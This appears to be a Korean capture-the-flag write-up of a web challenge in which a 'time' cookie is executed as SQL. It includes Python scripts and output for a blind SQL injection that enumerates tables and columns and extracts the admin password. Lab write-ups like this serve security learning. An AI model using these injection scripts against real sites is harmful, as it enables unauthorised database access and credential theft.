/
처음에 접속하면 이런 화면이 뜬다.
<!--
2022-11-08 07:05:21
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->페이지의 소스 코드를 보면 접속 시간과 함께 admin.php에 접속하지 말라는 주석이 있는데, 한 번 들어가 보자.
/admin.php
Secret password를 입력하라고 한다. 틀리게 입력하면 wrong password가 뜨는데, 빈 칸으로 제출하거나 0을 입력하면 아무것도 뜨지 않는다.
time cookie
time이라는 이름의 쿠키가 있는데, 이 값이 홈 페이지의 주석에 시간으로 나타난다. 쿠키 값을 수정하고 새로고침하면 주석의 시간도 바뀌는데, 0으로 수정하고 새로고침하면 <script>location.href='./';</script>가 뜨고 쿠키 값이 리셋된다.
살짝 게싱의 영역이지만 결론적으로 time 쿠키의 값은 SQL 쿼리이고, 실행 결과가 주석의 시간으로 나타난다. 예를 들어 (select 1)을 넣으면 시간은 2070-01-01 09:00:01이 된다.
Blind SQL Injection
쿼리에 따라 나오는 결과를 보고 Blind SQL injection을 수행할 수 있다.
Number of tables
# get number of tables
query = '(select count(table_name) from information_schema.tables where table_schema = database())'
res = requests.get(url, cookies={'time': query})
print(res.text)$ python3 solve.py
<!--
2070-01-01 09:00:02
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->테이블은 2개 존재한다.
Length of table name
# length of first table name
table_name_length = 1
while True:
query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 0, 1) t where length(table_name) = {table_name_length})'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
print(f'[+] Length of first table name: {table_name_length}')
break
else:
table_name_length += 1
# length of second table name
table_name_length = 1
while True:
query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 1, 1) t where length(table_name) = {table_name_length})'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
print(f'[+] Length of second table name: {table_name_length}')
break
else:
table_name_length += 1$ python3 solve.py
[+] Length of first table name: 13
[+] Length of second table name: 3Table name
# first table name
table_name = ''
for i in range(13):
for char in chars:
query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 0, 1) t where substr(table_name, {i + 1}, 1) = \'{char}\')'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
table_name += char
print(table_name)
break
# second table name
table_name = ''
for i in range(3):
for char in chars:
query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 1, 1) t where substr(table_name, {i + 1}, 1) = \'{char}\')'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
table_name += char
print(table_name)
break$ python3 solve.py
a
ad
adm
admi
admin
admin_
admin_a
admin_ar
admin_are
admin_area
admin_area_
admin_area_p
admin_area_pw
l
lo
log테이블들의 이름은 admin_area_pw와 log이다. admin_area_pw에 우리가 원하는 정보가 있을 것 같으니, 이 테이블에 어떤 컬럼들이 있는지 같은 방식으로 구해보자.
Number of columns
# number of columns in admin_area_pw
query = '(select count(column_name) from information_schema.columns where table_name = \'admin_area_pw\')'
res = requests.get(url, cookies={'time': query})
print(res.text)$ python3 solve.py
<!--
2070-01-01 09:00:01
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->admin_area_pw에는 한 개의 컬럼이 있다.
Length of column name
# length of column name
column_name_length = 1
while True:
query = f'(select count(column_name) from (select column_name from information_schema.columns where table_name = \'admin_area_pw\') c where length(column_name) = {column_name_length})'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
print(f'[+] Length of column name: {column_name_length}')
break
else:
column_name_length += 1$ python3 solve.py
[+] Length of column name: 2Column name
# column name
column_name = ''
for i in range(2):
for char in chars:
query = f'(select count(column_name) from (select column_name from information_schema.columns where table_name = \'admin_area_pw\') c where substr(column_name, {i + 1}, 1) = \'{char}\')'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
column_name += char
print(column_name)
break$ python3 solve.py
p
pwpw 컬럼에 저장된 값을 알아내면 될 것 같다.
Length of pw
# length of pw
pw_length = 1
while True:
query = f'(select count(pw) from (select pw from admin_area_pw) p where length(pw) = {pw_length})'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
print(f'[+] Length of pw: {pw_length}')
break
else:
pw_length += 1$ python3 solve.py
[+] Length of pw: 17pw
# pw
pw = ''
for i in range(17):
for char in chars:
query = f'(select count(pw) from (select pw from admin_area_pw) p where substr(pw, {i + 1}, 1) = \'{char}\')'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
pw += char
print(pw)
break$ python3 solve.py
k
ku
kud
kudo
kudos
kudos_
kudos_t
kudos_to
kudos_to_
kudos_to_b
kudos_to_be
kudos_to_bei
kudos_to_beis
kudos_to_beist
kudos_to_beistl
kudos_to_beistla
kudos_to_beistlabSolve
728x90
